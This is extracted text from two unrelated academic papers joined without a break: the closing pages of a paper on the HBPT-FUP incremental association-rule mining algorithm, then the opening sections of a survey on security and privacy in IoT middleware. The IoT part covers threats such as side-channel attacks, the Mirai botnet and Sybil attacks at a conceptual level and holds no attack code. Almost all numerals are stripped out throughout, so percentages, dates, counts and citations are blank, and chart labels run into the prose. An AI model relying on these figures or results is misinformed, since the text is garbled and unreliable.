the occupied memory space is related to the total number of items; ○ storing the frequent item sets determined by the minimum support, therefore, the memory space is related to the minimum support. a) study the impact of the number of transaction item sets on memory usage. a small number of experimental samples are extracted from the data set, and the minimum support degree of the apriori algorithm and the hbpt-fup algorithm is controlled (min_sup= . ), and the amount of updated data is sequentially increased. the apriori algorithm and the memory usage of the hbpt-fup algorithm on one of the pcs are recorded separately, as shown in figure . 
(set the minimum support threshold of the hbpt-fup algorithm to remain the same) figure . memory usage comparison as shown in figure , when the minimum support is unchanged and the number of transaction items increases, the number of items generated increases, and the memory space occupied is larger. the apriori algorithm updates the candidate set with the change of the number of transaction items. the memory space stores the candidate set and the frequent item set. the hbpt-fup algorithm is based on distributed, and only stores data and its frequency in the tree structure of each node. therefore, the apriori algorithm takes up more memory space than the hbpt-fup algorithm. b) study the impact of minimum support on memory usage. when the minimum support of the apriori algorithm changes from . to . , the data samples ( ) and increments ( ) remain unchanged, and the memory usage when running the apriori algorithm and the hbpt-fup algorithm on a pc is recorded separately. figure shows. (the minimum support threshold for the hbpt-fup algorithm is automatically estimated based on the newton interpolation polynomial when the database is updated) n u m b e r o f a ss o ci a ti o n r u le s number of transaction items apriori hbpt-fup m e m o ry u sa g e /k number of transaction items apriori hbpt-fup international journal of advanced network, monitoring and controls volume , no. , figure . memory usage comparison as shown in figure , the smaller the minimum support, the more the number of items generated, the larger the memory space occupied. in the case of the change of support degree, the apriori algorithm updates the candidate set with the change of the support degree, and saves the candidate set and the frequent item set in the memory space. the hbpt-fup algorithm does not generate the candidate set during the support change process, so the apriori algorithm occupies more memory than the hbpt-fup algorithm. v. conclusion in this paper, a parallel update algorithm based on load balancing for incremental update association mining algorithm hbpt-fup is proposed.the algorithm effectively realizes that when the database is updated, the original database is not scanned, and the newly added data is inserted into the tree based on the original b+ tree to obtain a frequent item set. handle large-scale data with load balancing technology. distribute data to different pcs in the cluster. the experimental results show that when the number of transaction records is the same as the amount of new data, the time spent by the hbpt-fup algorithm is less than . % of the apriori algorithm, which improves the efficiency of mass data processing. when the minimum support changes, the memory space occupied by the hbpt-fup algorithm on the same pc is much smaller than the apriori algorithm. the algorithm has some improvements in terms of efficiency and memory usage. acknowledgment first of all, i would like to thank my tutor during the master's degree, professor wang jianguo. during my writing stage, mr. wang continued to give guidance and help, and taught me the direction of my own research. mr. wang has a wealth of professional domain knowledge and excellent data mining direction. under the kind guidance of mr. wang, my ideas have been broadened, the bottlenecks in the research process have been solved, and my ideas have been implemented more steadily. at the same time, mr. wang is serious and responsible for his work and his mastery of professional knowledge. 
it is worth everyone to learn and respect.secondly, i would like to thank xi'an technological university for guiding me to grow up. finally, i am very grateful to the journal for including my thesis. references [ ] mao guojun, duan lijuan, wang shi et al. the first edition of data mining principles and algorithms, beijing tsinghua university press. : - . [ ] rakesh agrawal, tomaszimieliński,arun swami. mining association rules between sets of items in large databases[j]. acm sigmod record, , ( ). [ ] feng yucai, feng jianlin. incremental updating algorithm for association rules[j] .journal of software, , ( ): . [ ] yuan changan, data mining theory and spss clementine jewel [m]. beijing: publishing house of electronics industry, . [ ] xie peng-jun. study on parallelization of frequent item sets mining algorithm based on mapreduce [d]. nanjing: nanjing university, . [ ] shi liang, qian xue-zhong. study and implementation of parallel fp-growth algorithmbased on hadoop [j]. microelectronics and computer, , ( ): . [ ] incremental maintenance of discovered association rules and approximate dependencies[j]. alain pérez-alonso, ignacio j. blanco medina, luisa m. gonzález-gonzález, josé m. serrano chica. intelligent data analysis. ( ): . [ ] jes_us r, campa~na, juan m,et,al.indexing fuzzy numerical data with a b+ tree for fast retrieval using necessity-measured flexible conditions[j].world scientic, , ( ): . [ ] hu yanbo,zhong jun. based on clustering b + tree database index optimization algorithm [j]. computer applications, , ( ): . [ ] david w.cheung, jiawei han. maintenance of discovered association rules in large databases: an incremental updating technique. in proc of the twelfth international conference on data engineering, .usa: ieee, ( ): - . [ ] chen fengjuan.vertical data format mining of probabilistic data sets[j].journal of anyang teachers college, ( ): - + . [ ] wang yingqiang, shi yongsheng.application of b+ tree in database indexing[j].journal of yangtze university, , ( ): . [ ] chen xiaojiang, huang yucan, et al. numerical analysis. beijing: science and technology press. . . . . . m e m o ry u sa g e / k minimum support apriori hbpt-fup international journal of advanced network, monitoring and controls volume , no. , [ ] alan sexton,hayothielecke. reasoning about b+ trees with operational semantics and separation logic[j]. electronic notes in theoretical computer science, , . [ ] hyunyoonyun,danshimha,buhyunhwang,et al. mining association rules on significant rare data using relative support[j]. the journal of systems & software, , ( ). [ ] jia wang,hongguangli,jingwenhuang,et al. association rules mining based analysis of consequential alarm sequences in chemical processes[j]. journal of loss prevention in the process industries, , . a survey of secure middleware for the internet of things a peer-reviewed version of this preprint was published in peerj on may . view the peer-reviewed version (peerj.com/articles/cs- ), which is the preferred citable publication unless you specifically need to cite this preprint. fremantle p, scott p. . a survey of secure middleware for the internet of things. peerj computer science :e https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. 
a survey of secure middleware for the internet of things paul fremantle and philip scott university of portsmouth, portsmouth, uk abstract the rapid growth of small internet connected devices, known as the internet of things (iot), is creating a new set of challenges to create secure, private infrastructures. this paper reviews the current literature on the challenges and approaches to security and privacy in the internet of things, with a strong focus on how these aspects are handled in iot middleware. we focus on iot middleware because many systems are built from existing middleware and these inherit the underlying security properties of the middleware framework. the paper is composed of three main sections. firstly, we propose a matrix of security and privacy threats for iot. this matrix is used as the basis of a widespread literature review aimed at identifying requirements on iot platforms and middleware. secondly, we present a structured literature review of the available middleware and how security is handled in these middleware approaches. we utilise the requirements from the first phase to evaluate. finally, we draw a set of conclusions and identify further work in this area. keywords: security, privacy, internet of things, iot, middleware introduction the internet of things (iot) was originally coined as a phrase by kevin ashton in [ ], with reference to “taggable” items that used radio frequency identification devices (rfid) to become electronically identifiable and therefore amenable to interactions with the internet. with the ubiquity of cheap processors and system-on-chip based devices, the definition has expanded to include wireless and internet-attached sensors and actuators, including smart meters, home automation systems, internet- attached set-top-boxes, smartphones, connected cars, and other systems that connect the physical world to the internet either by measuring it or affecting it. there are a number of definitions of iot. for the purposes of this work, we will define it in the following way. an iot device is a system that contains either sensors or actuators or both and supports connection to the internet either directly or via some intermediary. a sensor is a subcomponent of a device that measures some part of the world, allowing the device to update internet and cloud systems with this information. a sensor may be as simple as a button (e.g. amazon dash button), but more complex sensors widely deployed include weather sensors (barometers, anemometers, thermometers), accelerometers and gps units, light sensors, air quality sensors, people-counters, as well as medical sensors (blood sugar, heart rate, etc), industrial sensors (production line monitoring, etc) and many more. actuators are electronically controlled systems that affect the physical world. these includes lights, heaters, locks, motors, pumps, relays and so forth. therefore the iot is the network of such devices together with the internet systems that are designed to interoperate and communicate with those devices, including the websites, cloud servers, gateways and so forth. the number of iot devices has grown rapidly, with a recent estimate suggesting that there were . billion internet attached devices in and a prediction of billion devices by [ ]. this brings with it multiple security challenges: • these devices are becoming more central to people’s lives, and hence the security is becoming more important. 
• many iot devices collect personally identifiable information (pii), which may lead to potential privacy concerns. • because devices can affect the physical world, there are potential attacks that may have greater impact than purely virtual attacks. • these devices, due to size and power limitations, may not support the same level of security that we would expect from more traditional internet-connected systems. • the sheer scale and number of predicted devices will create new challenges and require new approaches to security. because of the pervasive and personal nature of iot, privacy and security are important areas for research. in , more than , iot devices were conjoined into a hostile botnet named mirai that attacked the dns servers of the east coast of the us [ ]. the total attack bandwidth of this system was measured at more than gbps. in fact, the number of devices attacked was small compared to the potential: previous research [ ] has identified several million devices that are available for attack. therefore there is a strong motivation to find approaches that improve and enhance the security and privacy of the iot. many iot projects build upon existing platforms, also known as middleware. the oxford english dictionary [ ] defines middleware as: software that acts as a bridge between an operating system or database and applications, especially on a network. such systems can either improve security or reduce it: if the platform is built with privacy and security in mind then it can embed best practices and enable system designers to rapidly create secure systems. if platforms are built without security, or security is added as an afterthought, then it is possible that not only does the platform encourage the creation of insecure, privacy-negating systems, but also that it may make it more difficult to add security when problems are found. the creation of systems with security and privacy as a key design principle is known as privacy by design (pbd) [ ]. the rest of this work is laid out as follows. in section we outline the research approach and methodology used for the survey. in section we evaluate threats for security and privacy using a matrix model. in section , we use a three-layer model to evaluate iot privacy. from these models we present a set of requirements for iot privacy and security in section . in section we outline the structured survey of iot middleware systems. in section , we identify secure middleware systems and look at the security and privacy characteristics of each, using the previously identified requirements as a guide. in section we summarise the findings of the survey. finally, in section we look at the conclusions, contributions and further work in this area. approach and methodology in order to understand the security threats against the internet of things, we need an approach to classifying threats. the most widely used ontology of security threats is the confidentiality integrity availability (cia) triad [ ], which has been extended over the years. the extended ontology is referred to as the "cia plus" (cia+) model [ ]. in the course of reviewing the available literature and approaches to iot security, we have created a proposed expansion of the existing framework that we believe works better in the iot space.
in particular, we propose a new ontology based on a matrix of evaluation where we look at each of the classic security challenges in three different aspects: device/hardware, network, and cloud/server-side. in some cells in this matrix, we have not identified any areas where the iot space presents new challenges: in other words, whilst the domain space covered by these cells contains security challenges, those challenges are no different from existing web and internet security challenges in that domain. in those cells we can say that the challenges are "unchanged". in other cells we specifically identify those challenges that are significantly modified by the unique nature of the internet of things. in addition to the matrix, we utilise the three-layer privacy model from [ ] to explore privacy concerns in more detail. together, the matrix and three-layer model are then used to inform a set of requirements on iot middleware. in the second part of this work, we use a structured survey methodology to identify a set of middleware designed to support iot systems. we start with a specific set of search terms used against a meta-search engine to search across multiple databases. then we reviewed the abstracts of each identified paper and from these we identified a number of middleware systems. once the middleware systems were identified, we did not confine ourselves to the identified papers but also reviewed open source code, architecture documents and other resources. we evaluate each of the middleware systems against the identified requirements from the matrix evaluation. the contributions of this paper are: • a matrix model for evaluating threats to iot systems. • a structured literature review of security of middleware systems for iot. matrix evaluation table shows the matrix we will use for evaluating security challenges; its columns are the three aspects (a. device/hardware, b. network, c. cloud/server-side) and its rows are the classic security properties:

table . matrix of security challenges for the iot (columns: a. device/hardware, b. network, c. cloud/server-side)
confidentiality: (a) hardware attacks; (b) encryption with low-capability devices; (c) privacy, data leaks, fingerprinting
integrity: (a) spoofing, lack of attestation; (b) signatures with low-capability devices, sybil attacks; (c) no common device identity
availability: (a) physical attacks; (b) unreliable networks, ddos, radio jamming; (c) ddos (as usual)
authentication: (a) lack of ui, default passwords, hardware secret retrieval; (b) default passwords, lack of secure identities; (c) no common device identity, insecure flows
access control: (a) physical access, lack of local authentication; (b) lightweight distributed protocols for access control; (c) inappropriate use of traditional acls, device shadow
non-repudiation: (a) no secure local storage, no attestation, forgery; (b) lack of signatures with low-capability devices; (c) lack of secure identity and signatures

in each cell we summarise the main challenges that are different in the iot world, or at least exacerbated by the challenges of iot compared to existing internet security challenges. we will explore each cell in the matrix in detail below. each of the cells is given a designation from a to c and these letters are used as a key to refer to the cells below. the three aspects (hardware/device, network, cloud/server) were chosen because, as we read the available literature, these areas became clear as a way of segmenting the unique challenges within the context of the iot.
these form a clear logical grouping of the different assets involved in iot systems. we will provide a quick overview of each area before we look in detail at each cell of the matrix. / device and hardware iot devices have specific challenges that go beyond those of existing internet clients. these challenges come from: the different form factors of iot devices, from the power requirements of iot devices, and from the hardware aspects of iot devices. the rise of cheap mobile telephony has driven down the costs of -bit processors (especially those based around the arm architec- ture [ ]), and this is increasingly creating lower cost microcontrollers and system-on-chip (soc) devices based on arm. however, there are still many iot devices built on -bit processors, and occasionally, -bit [ ]. in particular the open source hardware platform arduino [ ] supports both -bit and -bit controllers, but the -bit controllers remain considerably cheaper and at the time of writing are still widely used. the challenges of low-power hardware mean that certain technologies are more or less suitable. in the details of each cell below we will address specific details as they pertain to security. in addition, there are specific protocols and approaches designed for iot usage that use less power and are more effective. in [ ] there is a comparison of extensible markup language (xml) parsing with binary alternatives. the processing time on a constrained device is more than a magnitude slower using xml, and that the heap memory used by xml is more than kb greater than with binary formats. these improvements result in a % saving in power usage in their tests. xml security standards such as xml encryption and the related ws-encryption standard have significant problems in an iot device model. for example, any digital signature in xml security needs a process known as xml canonicalisation (xml c n). xml canonicalisation is a costly process in both time and memory. [ ] shows that the memory usage is more than × the size of the message in memory (and xml messages are already large for iot devices). we looked for any work on implementing ws-security on arduino, esp or atmel systems (which are common targets for iot device implementations) without success. xml performance on small devices can be improved using efficient xml interchange (exi), which reduces network traffic [ ]. network iot devices may use much lower power, lower bandwidth networks than existing internet systems. cellular networks often have much higher latency and more “dropouts” than fixed networks [ ]. the protocols that are used for the web are often too data-intensive and power-hungry for iot devices. network security approaches such as encryption and digital signatures are difficult and in some cases impractical in small devices. new low-power, low-bandwidth networks such as lorawan are gaining significant traction. there have been some limited studies comparing the power usage of different protocols. in [ ] there is comparison of using constrained application protocol (coap) with exi against hypertext transfer protocol (http), showing efficiency gains in using coap. in [ ], mqtt over tls is shown to use less power than http over tls in several scenarios. in [], there is a comparison of network traffic between coap and message queueing telemetry transport (mqtt) showing that each performs better in different scenarios, with similar overall performance. 
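to make the message-size point concrete, the following is a minimal sketch of our own (not taken from the cited studies) that compares one temperature reading encoded as xml with the same reading packed into a fixed binary layout; the element names and byte layout are illustrative assumptions rather than any standard encoding.

```python
# Compare the on-the-wire size of one reading encoded as XML versus a
# fixed binary layout. Field names and layout are illustrative only.
import struct

device_id, timestamp, temperature = 42, 1_500_000_000, 21.5

xml_payload = (
    "<reading><device>{}</device><ts>{}</ts><temp>{}</temp></reading>"
    .format(device_id, timestamp, temperature)
    .encode("utf-8")
)

# Hypothetical layout: 2-byte device id, 4-byte timestamp, 4-byte float.
binary_payload = struct.pack("!HIf", device_id, timestamp, temperature)

print(len(xml_payload), "bytes as xml")      # 74 bytes
print(len(binary_payload), "bytes packed")   # 10 bytes
```

even before any parsing cost is considered, the textual encoding is several times larger, which matters for battery- and bandwidth-constrained devices.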
this is an area where more study is clearly needed, but we can draw conclusions that traditional protocols such as simple object access protocol (soap)/http are unsuited to iot usage. cloud/server-side while many of the existing challenges apply here, there are some aspects that are exacerbated by the iot for the server-side or cloud infrastructure. these include: the often highly personal nature of data that is being collected and the requirement to manage privacy; the need to provide user-managed controls for access; and the lack of clear identities for devices making it easier to spoof or impersonate devices. . a . device confidentiality hardware devices have their own challenges for security. there are systems that can provide tamper- proofing and try to minimise attacks, but if an attacker has direct access to the hardware, they can often break it in many ways. for example, there are devices that will copy the memory from flash memory into another system (known as nand mirroring). code that has been secured can often be broken with https://www.lora-alliance.org/ / scanning electron microscopes. skorobogatov from cambridge university has written a comprehensive study [ ] of many semi-invasive attacks that can be done on hardware. another common attack is called a side-channel attack [ , ] where the power usage or other indirect information from the device can be used to steal information. this means that it is very difficult to protect secrets on a device from a committed attacker. a specific outcome of this is that designers should not rely on obscurity to protect devices. a clear example of this was the mifare card used as the london oyster card and for many other authentication and smart-card applications. the designers created their own cryptographic approach and encryption algorithms. security researchers used a number of techniques to break the obscurity, decode the algorithm, find flaws in it and create a hack that allowed free transport in london as well as breaking the security on a number of military installations and nuclear power plants [ ]. similarly, relying on the security of a device to protect a key that is used across many devices is a significant error. for example, the encryption keys used in dvd players and xbox gaming consoles [ ] were broken meaning that all devices were susceptible to attack. a related issue to confidentiality of the data on the device is the challenges inherent in updating devices and pushing keys out to devices. the use of public key infrastructure (pki) requires devices to be updated as certificates expire. the complexity of performing updates on iot devices is harder, especially in smaller devices where there is no user interface. for example, some devices need to be connected to a laptop in order to perform updates. others need to be taken to a dealership or vendor. the distribution and maintenance of certificates and public-keys onto embedded devices is complex [ ]. in [ ] a novel approach to supporting mutual authentication in iot networks is proposed. however, this model assumes that each device has a secure, shared key (called kir already deployed and managed into every device. as discussed above, ensuring this key is not compromised is a challenge, as the authors admit: “however, further research is required to realize the secure sharing of kir.” in addition, sensor networks may be connected intermittently to the network resulting in limited or no access to the certificate authority (ca). 
to address this, the use of threshold cryptographic systems that do not depend on a single central ca has been proposed [ ], but this technology is not widely adopted: in any given environment this would require many heterogeneous things to support the same threshold cryptographic approach. this requires human intervention and validation, and in many cases this is another area where security falls down. for example, many situations exist where security flaws have been fixed but because devices are in homes, or remote locations, or seen as appliances rather than computing devices, updates are not installed [ ]. the misfortune cookie [ ] demonstrates that even when security fixes are available, some manufacturers do not make them available to customers and continue to ship insecure systems. it is clear from the number of publicised attacks [ , , ] that many device designers have not adjusted to the challenges of designing devices that will be connected either directly or indirectly to the internet. a further security challenge for confidentiality and hardware is the fingerprinting of sensors or data from sensors. in [ ] it has been shown that microphones, accelerometers and other sensors within devices have unique “fingerprints” that can uniquely identify devices. effectively there are small random differences in the physical devices that appear during manufacturing that can be identified and used to recognise individual devices across multiple interactions. . b : network confidentiality the confidentiality of data on the network is usually protected by encryption of the data. there are a number of challenges with using encryption in small devices. performing public key encryption on -bit microcontrollers has been enhanced by the use of elliptic curve cryptography (ecc) [ , ]. ecc reduces the time and power requirements for the same level of encryption as an equivalent rivest, shamir, and adleman public key cryptography (rsa) public-key encryption [ ] by an order of magnitude [ , , ]: rsa encryption on constrained -bit microcontrollers may take minutes to complete, whereas similar ecc-based cryptography completes in seconds. however, despite the fact that ecc enables -bit microcontrollers to participate in public-key encryption systems, in many cases it is not used. we can speculate as to why this is: firstly, as evidenced by [ ], the encryption algorithms consume a large proportion of the available rom on small controllers. secondly, there is a lack of standard open source software. for example, a search that we carried out (on the st april ) of the popular open source site github for the words “arduino” and “encryption” revealed repositories / compared to “arduino” and “http” which revealed repositories. these repositories were not limited to network level encryption. however, recently an open source library for aes on arduino [ ] has made the it more effective to use cryptography on atmel-based hardware. while ecc is making it possible for low-power devices to be more efficient in performing cryptography operations, in the nsa made an unprecedented warning against ecc . we don’t yet know why, as of the time of writing. there are differing theories. one known issue with both prime numbers and elliptic curves is quantum computing. in quantum computers, instead of each bit being or , each qubit allows a superposition of both and , allowing quantum computers to solve problems that are very slow for classical computers in a fraction of the time. 
at the moment general purpose quantum computers are very simple and confined to laboratories, but they are increasing in power and reliability. in , peter shor identified an algorithm for quantum computers [ ] that performs prime factorization in polynomial time, which effectively means that most existing public key cryptography (pkc) will be broken once sufficiently powerful quantum computers come online. given that most quantum computers are as yet ineffective, there is some concern that maybe the problem with ecc is actually based on classical computing, but this is all speculation. one thing that we do know is that ecc is much easier to do on iot devices, and especially on low-power, - or -bit systems. therefore this warning is worrying for iot developers. another key challenge in confidentiality is the complexity of the most commonly used encryption protocols. the standard transport layer security (tls) [ ] protocol can be configured to use ecc, but even in this case the handshake process requires a number of message flows and is sub-optimal for small devices as documented in [ ]. [ ] has argued that using tls with pre shared key (psk) improves the handshake. psk effectively allows tls to use traditional symmetric cryptography instead of public key (assymetric) cryptography. however, they fail to discuss in any detail the significant challenges with using psk with iot devices: the fact that either individual symmetric keys need to be deployed onto each device during the device manufacturing process, or the same key re-used. in this case there is a serious security risk that a single device will be broken and thus the key will be available. some iot devices use user datagram protocol (udp) instead of the more commonly used transport control protocol (tcp). both protocols are supported on the internet. udp is unreliable, and is typically better suited to local communications on trusted networks. it is more commonly used between iot devices and gateways rather than directly over the internet, although, like all generalisations there are exceptions to this rule. tls only works with tcp, and there is an alternative protocol for udp. datagram transport layer security (dtls) [ ] provides a mapping of tls to udp networks, by adding retransmission and sequencing which are assumed by tls. while the combination of dtls and udp is lighter-weight than tls and tcp, there is still a reasonably large ram and rom size required for this [ ], and this requires that messages be sent over udp which has significant issues with firewalls and home routers, making it a less effective protocol for iot applications [ ]. there is ongoing work at the ietf to produce an effective profile of both tls and dtls for the iot [ ]. a significant area of challenge for network confidentiality in iot is the emergence of new radio protocols for networking. previously there were equivalent challenges with wifi networks as protocols such as wired equivalency privacy (wep) were broken [ ], and there are new attacks on protocols such as bluetooth low energy (ble) (also known as bluetooth . ). for example, while ble utilises advanced encryption standard (aes) encryption which has a known security profile, a new key exchange protocol was created, which turns out to be flawed, allowing any attacker present during key exchange to intercept all future communications [ ]. one significant challenge for iot is the length of time it takes for vulnerabilities to be addressed when hardware assets are involved. 
while the ble key exchange issues are addressed in the latest revision of ble, we can expect it to take a very long time for the devices that encode the flawed version in hardware to be replaced, due to the very large number of devices and the lack of updates for many devices. by analogy, many years after the wep issues were uncovered, a study showed that % of wifi networks were still at risk [ ]. even setting aside the confidentiality of the data itself, there is one further confidentiality issue around iot devices in the network, and that is the confidentiality of the metadata. many iot systems rely on radio transmission and in many cases they can be fingerprinted or identified by the radio signature. (two footnotes to the earlier discussion belong here: the github search described above was repeated on th feb , by which time the number of repositories for "arduino" and "encryption" had grown, as had the number for "arduino" and "http", demonstrating that support for encryption is growing slowly; the nsa warning against ecc mentioned above is discussed at https://threatpost.com/nsas-divorce-from-ecc-causing-crypto-hand-wringing/.) for example, bluetooth and wifi systems use unique identifiers called mac (media access control) addresses. these can be identified by scanning, and a number of systems have been deployed to do exactly that, including in airports and in cities [ ]. these systems can effectively follow users around geographically. if the user then connects to a system, that fingerprint can be associated with the user, and the previously collected location information can be correlated with that user. in a similar attack, security researchers recently found [ ] that they could fingerprint cars based on transmissions from tyre pressure monitors, and in addition that they could drive behind a car and, from up to feet away, signal to the driver that the tyre pressure was dangerously low when in fact it wasn't. such an attack could easily be used to get a driver to stop and leave their car. in [ ] a theoretical model of the traceability of iot devices, and particularly radio frequency identification device (rfid) systems, is proposed in order to prevent unauthorised data being accessible, and a protocol that preserves untraceability is described. many of the same references and issues apply to cell b where we look at the use of digital signatures with low-power devices. . c . cloud confidentiality in the main, the issues around cloud confidentiality are the same as the issues in non-iot systems. there are, however, some key concerns over privacy that are unique to the internet of things. for example, the company fitbit [ ] made data about users' sexual activity available and easily searchable online [ ] by default. there are social and policy issues regarding the ownership of data created by iot devices [ , ]. we address these issues in more detail in cell c where we look at the access control of iot data and systems in the cloud and on the server side. a second concern that is exacerbated by the internet of things is the correlation of data and metadata, especially around de-anonymisation. in [ ] it was shown that anonymous metadata could be de-anonymised by correlating it with other publicly available social metadata. this is a significant concern with iot data, and it is also closely related to the fingerprinting of sensors within devices as discussed in cell a . an important model for addressing these issues in the cloud is to filter, summarise and stream-process the data coming from iot devices before this data is more widely published.
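as a minimal illustration of this summarisation idea (our sketch; the window size and thresholds are arbitrary assumptions, not taken from any cited system), raw accelerometer samples can be reduced on the device or gateway to a coarse activity label before anything is published:

```python
# Summarise raw accelerometer magnitudes into a coarse activity label so the
# raw signal (usable for fingerprinting/de-anonymisation) never leaves the
# gateway. Window size and thresholds are illustrative assumptions.
from statistics import mean

def summarise(window):
    """Reduce a window of accelerometer magnitudes (in g) to a label."""
    avg = mean(window)
    if avg < 1.1:
        return "idle"
    if avg < 1.8:
        return "walking"
    return "running"

raw_samples = [1.02, 1.05, 1.71, 1.69, 1.74, 1.66]   # stays local
published = summarise(raw_samples)                    # only "walking" is shared
print(published)
```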
for example, if we only publish a summarised co-ordinate rather than the raw accelerometer data we can potentially avoid fingerprinting de-anonymisation attacks. in addition, an important concern has been raised in the recent past with the details of the government sponsored attacks from the us national security agency (nsa) and uk government communications headquarters (gchq) that have been revealed by edward snowden [ ]. these bring up three specific concerns on iot privacy and confidentiality. the first concern is the revelations that many of the encryption and security systems have had deliberate backdoor attacks added to them so as to make them less secure [ ]. the second concern is the revelation that many providers of cloud hosting systems have been forced to hand over encryption keys to the security services [ ]. the third major concern is the revelations on the extent to which metadata is utilised by the security services to build up a detailed picture of individual users [ ]. the implications of these three concerns when considered in the light of the internet of things is clear: a significantly deeper and larger amount of data and metadata will be available to security services and to other attackers who can utilize the same weaknesses that the security services compromise. . cell a : integrity & hardware/device the concept of integrity refers to maintaining the accuracy and consistency of data. in this cell of the matrix, the challenges are in maintaining the device’s code and stored data so that it can be trusted over the lifecycle of that device. in particular the integrity of the code is vital if we are to trust the data that comes from the device or the data that is sent to the device. the challenges here are viruses, firmware attacks and specific manipulation of hardware. for example, [ ] describes a worm attack on router and iot firmware, where each compromised system then compromises further systems, leaving behind a slew of untrustworthy systems. the traditional solution to such problems is attestation [ , , ]. attestation is important in two ways. firstly, attestation can be used by a remote system to ensure that the firmware is unmodified and therefore the data coming from the device is accurate. secondly, attestation is used in conjunction with hardware-based secure storage (hardware security managers, as described in [ ]) to ensure that authentication keys are not misused. the model is as follows. / in order to preserve the security of authentication keys in a machine where human interaction is involved, the user is required to authenticate. often the keys are themselves encrypted using the human’s password or a derivative of the identification parameters. however, in an unattended system, there is no human interaction. therefore the authentication keys need to be protected in some other way. encryption on its own is no help, because the encryption key is then needed and this becomes a circular problem. the solution to this is to store the authentication key in a dedicated hardware storage. however, if the firmware of the device is modified, then the modified firmware can read the authentication key, and offer it to a hacker or misuse it directly. the solution to this is for an attestation process to validate the firmware is unmodified before allowing the keys to be used. then the keys must also be encrypted before sending them over any network. these attestation models are promoted by groups such the trusted computing group [ ], and samsung knox [ ]. 
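a highly simplified simulation of that flow (ours; the hash-based measurement and key handling below are software stand-ins for a real tpm or attestation api, which would be hardware-backed) is:

```python
# Simplified simulation of measured-boot style attestation: the stored
# authentication key is only released if the current firmware measurement
# matches the expected ("golden") value provisioned at manufacture.
import hashlib, hmac, os

EXPECTED_MEASUREMENT = hashlib.sha256(b"firmware-v1.0").hexdigest()

class SecureStorage:
    """Stand-in for dedicated hardware key storage."""
    def __init__(self):
        self._auth_key = os.urandom(32)

    def release_key(self, firmware_image: bytes) -> bytes:
        measurement = hashlib.sha256(firmware_image).hexdigest()
        if not hmac.compare_digest(measurement, EXPECTED_MEASUREMENT):
            raise PermissionError("attestation failed: firmware modified")
        return self._auth_key   # a real system would wrap/encrypt this for transport

storage = SecureStorage()
key = storage.release_key(b"firmware-v1.0")          # unmodified firmware: key released
# storage.release_key(b"firmware-v1.0-trojan")       # modified firmware: PermissionError
```

in practice this logic is anchored in hardware rather than in software as sketched here.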
these rely on specialized hardware chips such as the atmel at sc [ ] which implement the concept of a trusted platform module (tpm) [ ]. there is research into running these for smart grid devices [ ]. however, whilst there is considerable discussion of using these techniques with iot, during our literature review we could not find evidence of any real-world devices apart from those based on mobile-phone platforms (e.g. phones and tablets) that implemented trusted computing and attestation. . cell b : network integrity maintaining integrity over a network is managed as part of the public-key encryption models by the use of digital signatures. the challenges for iot are exactly those we already identified in the cell b above where we described the challenges of using encryption from low-power iot devices. however, there is a further concern with iot known as the sybil attack [ ]. a sybil attack is where a peer-to-peer network is taken over when an attacker creates a sufficiently large number of fake identities to persuade the real systems of false data. a sybil attack may be carried out by introducing new iot devices into a locality or by suborning existing devices. for example, it is expected that autonomous cars may need to form local ephemeral peer-to-peer networks based on the geography of the road system. a significant threat could be provided if a sybil attack provided those cars with incorrect data about traffic flows. . c : cloud integrity the biggest concern in this area is the lack of common concepts and approaches for device identity. integrity relies on identity - without knowing who or what created data, we cannot trust that data. we address this in cells a , b and c . one specific aspect of trust in cloud for iot scenarios is where the device lacks the power to participate in trust and must therefore trust the cloud server. one key example of this is where a blockchain [ ] is being used in respect of iot devices. blockchains are cryptographically secure ledgers that typically require a significant amount of memory, disk space and processor power to work [ ]. these requirements go beyond typical iot devices and even beyond more powerful systems in iot networks such as hubs. one option to address this is to use remote attestation, but as yet there is little or no work in this space. . a : hardware availability one of the significant models used by attackers is to challenge the availability of a system, usually through a denial of service (dos) or distributed denial of service (ddos) attack. dos attacks and availability attacks are used in several ways by attackers. firstly, there may be some pure malicious or destructive urge (e.g. revenge, commercial harm, share price manipulation) in bringing down a system. secondly, availability attacks are often used as a pre-cursor to an authentication or spoofing attack. iot devices have some different attack vectors for availability attacks. these include resource consumption attacks (overloading restricted devices), physical attacks on devices. a simple availability attack on an iot device might be to force it to use more power (e.g. by initiating multiple key exchanges over bluetooth) and thereby draining the battery. another even more obvious availability challenge would be to simply physically destroy a device if it is left in a public or unprotected area. named after a character in a book who exhibits multiple personality disorder / . b . 
network availability there are clearly many aspects of this that are the same as existing network challenges. however, there are some issues that particularly affect iot. in particular, there are a number of attacks on local radio networks that are possible. many iot devices use radio networking (bluetooth, wifi, g, general packet radio service (gprs), lora and others) and these can be susceptible to radio jamming. in [ ] there is a survey of jamming attacks and countermeasures in wireless sensor network (wsn). another clear area of attack is simply physical access. for example, even wired networks are much more susceptible to physical attacks when the devices are spread widely over large areas. . c : cloud availability the challenges here are not new. elsewhere we looked at dos attacks and ddos attacks. the biggest challenge here is the use of iot devices themselves to create the ddos attack on the server, as in the mirai botnet. . a : device authentication we will consider the authentication of the device to the rest of the world in cells b and c . in this cell of the matrix we must consider the challenges of how users or other devices can securely authenticate to the device itself. these are however related: a user may bypass or fake the authentication to the device and thereby cause the device to incorrectly identify itself over the network to other parts of the internet. some attacks are very simple: many devices come with default passwords which are never changed by owners. in a well-publicised example [ ], a security researcher gained access to full controls of a number of “smart homes”. as discussed above, the mirai attack took control of devices that used default or easily guessed passwords. similarly many home routers are at risk through insecure authentication [ ]. such vulnerabilities can then spread to other devices on the same network as attackers take control of the local area network. a key issue here is the initial registration of the device. a major issue with hardware is when the same credential, key, or password is stored on many devices. devices are susceptible to hardware attacks (as discussed above) and the result is that the loss of a single device may compromise many or all devices. in order to prevent this, devices must either be pre-programmed with unique identifiers and credentials at manufacturing time, or must go through a registration process at setup time. in both cases this adds complexity and expense, and may compromise usability. in [ ] there is a proposal for the use of the oauth dynamic client registration [ ] process to create unique keys/credentials for each device. in [ ] there is a well-defined and secure process for device and user registration that allows users to take control of devices in scenarios where the device itself offers no user interface (ui) or a very basic ui. . b : network authentication unlike browsers or laptops where a human has the opportunity to provide authentication information such as a userid and password, iot devices normally run unattended and need to be able to power-cycle and reboot without human interaction. this means that any identifier for the device needs to be stored in the program memory (usually sram), rom or storage of the device. this brings two distinct challenges: • the device may validly authenticate, but the program code may have been changed, and therefore it may behave incorrectly. • another device may steal the authentication identifier and may spoof the device. 
